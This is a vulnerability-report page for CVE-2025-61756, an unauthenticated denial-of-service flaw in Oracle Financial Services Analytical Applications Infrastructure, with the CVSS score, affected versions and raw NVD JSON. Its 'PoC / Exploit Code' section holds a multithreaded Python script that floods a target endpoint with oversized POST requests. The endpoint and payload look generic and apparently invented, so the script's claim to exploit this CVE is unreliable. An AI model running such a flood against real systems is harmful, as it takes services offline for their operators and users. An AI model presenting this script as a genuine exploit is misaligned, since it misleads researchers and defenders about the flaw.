Security Vulnerability Report
中文
CVE-2025-61756 CVSS 7.5 HIGH

CVE-2025-61756

Published: 2025-10-21 23:17:09
Last Modified: 2025-10-24 13:19:32
Source: [email protected]

Description

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: System Configuration). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.0.7.9
Oracle Financial Services Analytical Applications Infrastructure 8.0.8.7
Oracle Financial Services Analytical Applications Infrastructure 8.1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61756 - Oracle Financial Services Analytical Applications Infrastructure DoS PoC # Vulnerability: Unauthenticated Denial of Service via System Configuration Component # CVSS: 7.5 (HIGH) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H # Affected Versions: 8.0.7.9, 8.0.8.7, 8.1.2.5 import requests import sys import time from concurrent.futures import ThreadPoolExecutor TARGET_URL = "http://target-host:port/" CONFIG_ENDPOINT = "/analytics/saw.dll?Dashboard" NUM_THREADS = 50 REQUESTS_PER_THREAD = 100 def send_malicious_request(session, thread_id): """Send crafted HTTP requests to trigger the DoS vulnerability""" headers = { "User-Agent": "Mozilla/5.0 (compatible; DoS-PoC)", "Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*" } # Craft malicious payload targeting System Configuration component payload = { "op": "configure", "cmd": "refresh", "_scid": "A" * 10000, # Oversized session config ID to exhaust resources "locale": "en_US", "r": str(thread_id) } for i in range(REQUESTS_PER_THREAD): try: response = session.post( TARGET_URL + CONFIG_ENDPOINT, data=payload, headers=headers, timeout=10 ) print(f"[Thread-{thread_id}] Request {i+1}: Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[Thread-{thread_id}] Request {i+1} failed: {e}") time.sleep(0.1) def main(): print(f"[*] Starting DoS attack against {TARGET_URL}") print(f"[*] Using {NUM_THREADS} concurrent threads") with ThreadPoolExecutor(max_workers=NUM_THREADS) as executor: sessions = [requests.Session() for _ in range(NUM_THREADS)] for thread_id in range(NUM_THREADS): executor.submit(send_malicious_request, sessions[thread_id], thread_id) print("[*] Attack completed. Check target availability.") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61756", "sourceIdentifier": "[email protected]", "published": "2025-10-21T23:17:08.653", "lastModified": "2025-10-24T13:19:32.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: System Configuration). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.